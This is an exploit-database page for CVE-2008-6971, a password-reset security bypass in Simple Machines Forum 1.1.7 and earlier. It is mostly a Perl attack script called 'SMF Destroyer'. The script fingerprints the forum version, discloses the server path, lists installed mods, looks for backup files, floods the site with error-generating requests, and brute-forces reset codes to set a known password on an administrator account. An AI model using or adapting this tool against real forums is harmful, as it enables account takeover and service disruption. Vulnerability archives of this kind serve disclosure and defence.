Vulners
Lucene search
Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Simple Machines Forum < 1.1.6 Random Number Generator Credentials Disclosure | 8 Sep 200800:00 | – | nessus |
| Simple Machines Forum Validation Code Prediction Arbitrary Password Reset | 15 Sep 200800:00 | – | nessus |
 | CVE-2008-6971 | 6 Sep 200800:00 | – | circl |
 | CVE-2008-6971 | 13 Aug 200916:00 | – | cve |
 | CVE-2008-6971 | 13 Aug 200916:00 | – | cvelist |
 | EUVD-2008-6930 | 7 Oct 202500:30 | – | euvd |
 | CVE-2008-6971 | 13 Aug 200916:30 | – | nvd |
 | Simple Machines Forum (SMF) < 1.1.6 Password Reset Vulnerability | 25 Sep 200800:00 | – | openvas |
 | Code injection | 13 Aug 200916:30 | – | prion |
source: http://www.securityfocus.com/bid/33219/info
Simple Machines Forum is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature.
An attacker can exploit this issue to gain administrative access to the application, which may allow the attacker to compromise the application; other attacks are also possible.
Versions up to and including Simple Machines Forum 1.1.7 are vulnerable.
UPDATE (February 6, 2009): The vendor indicates that this issue was resolved in Simple Machines Forum 1.0.14 and 1.1.6.
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;
#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c Cracks links Password
Recovery (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by
SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";
}
sub generador() {
my $password = "";
my @chars = split(" ",
"0 1 2 3 4 5 6 7 8 9 a b c d e
f g h i j k l m n o p q r s t
u v w x y z");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 35);
$password .= $chars[$_rand];
}
return $password;
}
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}
print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jan 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 27.5
EPSS0.05711